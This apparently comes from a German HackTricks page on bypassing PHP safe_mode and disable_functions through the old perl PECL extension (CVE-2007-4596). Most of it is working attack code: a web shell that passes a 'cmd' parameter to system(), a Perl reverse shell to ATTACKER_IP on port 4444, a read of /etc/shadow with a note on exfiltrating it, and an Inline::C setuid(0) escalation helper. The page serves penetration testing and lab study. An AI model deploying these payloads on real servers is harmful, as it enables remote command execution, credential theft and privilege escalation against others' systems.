PHP Perl Extension Safe_mode Bypass Exploit

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

• Überprüfen Sie die Abonnementpläne!
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
• Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

Hintergrund

Das als CVE-2007-4596 geführte Problem stammt aus der veralteten perl PHP-Erweiterung, die einen vollständigen Perl-Interpreter einbettet, ohne die PHP-Controls safe_mode, disable_functions oder open_basedir zu beachten. Jeder PHP-Worker, der extension=perl.so lädt, erhält uneingeschränkten Perl-eval, sodass die Ausführung von Befehlen trivial bleibt, selbst wenn alle klassischen PHP-Prozessstart-Primitiven blockiert sind. Obwohl safe_mode in PHP 5.4 entfiel, liefern viele veraltete Shared-Hosting-Stacks und verwundbare Labs es noch aus, sodass dieser Bypass immer noch wertvoll ist, wenn man auf veralteten Control Panels landet.

Aufbau einer testbaren Umgebung in 2025

• Die zuletzt öffentlich ausgelieferte Version (perl-1.0.1, Januar 2013) zielt auf PHP ≥5.0. Lade sie von PECL, kompiliere sie für den exakten PHP-Branch, den du angreifen möchtest, und lade sie global (php.ini) oder via dl() (falls erlaubt).
• Schnelles Debian-basiertes Lab-Rezept:

sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2

• Während der Ausnutzung die Verfügbarkeit mit var_dump(extension_loaded('perl')); oder print_r(get_loaded_extensions()); bestätigen. Falls nicht vorhanden, suche nach perl.so oder missbrauche beschreibbare php.ini/.user.ini-Einträge, um es zu erzwingen.
• Da der Interpreter im PHP-Worker lebt, werden keine externen Binaries benötigt — Netzwerk-Ausgangsfilter oder proc_open-Blacklists sind unerheblich.

Original PoC (NetJackal)

Aus http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, noch nützlich, um zu bestätigen, dass die Erweiterung auf eval reagiert:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Moderne Payload-Verbesserungen

1. Full TTY over TCP

Der eingebettete Interpreter kann IO::Socket laden, selbst wenn /usr/bin/perl blockiert ist:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. File-System Escape selbst mit open_basedir

Perl ignoriert PHPs open_basedir, sodass du beliebige Dateien lesen kannst:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Leite die Ausgabe über IO::Socket::INET oder Net::HTTP — to exfiltrate data — ohne PHP-managed descriptors zu berühren.

3. Inline Compilation for Privilege Escalation

Wenn Inline::C systemweit vorhanden ist, kompiliere Helfer innerhalb der Anfrage, ohne dich auf PHP’s ffi oder pcntl zu verlassen:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Betrachte Perl als LOLBAS-Toolkit — z. B. MySQL-DSNs ausgeben, selbst wenn mysqli fehlt:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

Referenzen

• CVE-2007-4596 summary and timeline
• PECL perl extension package information

Tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

• Überprüfen Sie die Abonnementpläne!
• Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
• Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.